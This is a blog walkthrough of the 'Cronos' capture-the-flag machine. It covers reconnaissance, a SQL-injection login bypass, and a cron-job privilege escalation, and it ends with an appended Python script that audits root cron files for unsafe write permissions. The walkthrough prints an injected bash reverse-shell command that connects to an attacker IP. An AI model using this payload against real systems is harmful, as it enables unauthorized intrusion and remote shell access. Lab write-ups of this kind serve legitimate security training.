CRONOS

Burak Dirlik
Jun 28, 2024

We start with an nmap scan, as always, and see that ports 22, 53 and 80 are open.

nmap -sC -sV -O -o nmap.txt 10.129.165.192

Let's fuzz for directories.

dirsearch -u 10.129.165.192 -t 10 --random-agent --full-url -x 400,403,404,500

Directory fuzzing returns nothing. We will find the existing domain names with a DNS zone transfer and add them to our /etc/hosts file.

The domain names we found cannot be reached directly from the browser, so we add them to our /etc/hosts file.

There is a login panel at admin.cronos.htb. We can log in when we try SQL injection.

We try a brute-force attack with SQL payloads that bypass the login, and one payload works.

As we can see, Linux commands work. This gives us a basic shell, but it is very limited, so we will use a reverse shell to get a fully interactive shell. We open a netcat listener and execute the following code from the net tool.

; /bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.94/443 0>&1"

We get the shell and the user flag; now we will do privilege escalation.

We check whether any cron job is run by root. There is a file called artisan. If we replace this file with a reverse shell, we get a root shell. It's a little bit complicated here.

We save it on our machine. To send this PHP reverse shell code to the target machine, we will start an HTTP server on our machine.

We replace artisan with the reverse shell. Since artisan is called by root, when we open netcat in another terminal, a shell with root privileges is spawned and connects back to netcat.
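
A hardening check for the misconfiguration described above, as an added example that is not part of the original write-up: it lists the files that root cron jobs reference in a system crontab and reports any that a non-root account could modify. The /etc/crontab location and all function names are assumptions.

```python
import os
import re
import stat

def root_job_paths(crontab_text):
    """Absolute paths named in commands that a system crontab runs as root."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        # Skip blanks, comments and VAR=value environment lines.
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue
        fields = line.split(None, 6)  # five schedule fields, user, command
        if len(fields) == 7 and fields[5] == "root":
            paths += [t for t in fields[6].split() if t.startswith("/")]
    return paths

def write_risk(path, trusted_uids=(0,)):
    """Reason an untrusted account could change `path`, or None."""
    st = os.stat(path)
    is_dir = stat.S_ISDIR(st.st_mode)
    kind = "directory" if is_dir else "file"
    if st.st_uid not in trusted_uids:
        return f"{kind} {path} is owned by uid {st.st_uid}"
    # A sticky directory (like /tmp) does not let others replace root's files.
    if st.st_mode & stat.S_IWOTH and not (is_dir and st.st_mode & stat.S_ISVTX):
        return f"{kind} {path} is world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return f"{kind} {path} is writable by gid {st.st_gid}"
    return None

def audit(crontab_text, trusted_uids=(0,)):
    """Findings for each regular file a root job references, and its directory."""
    findings = []
    for path in root_job_paths(crontab_text):
        if not os.path.isfile(path):  # ignores /dev/null and missing paths
            continue
        for target in (path, os.path.dirname(path)):
            reason = write_risk(target, trusted_uids)
            if reason:
                findings.append(reason)
    return findings

if __name__ == "__main__":
    with open("/etc/crontab") as fh:  # assumed location of the system crontab
        for finding in audit(fh.read()):
            print("[!]", finding)
```

Any finding means the file or its directory should be owned by root and not writable by the web server account, or the job should run as an unprivileged user instead.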
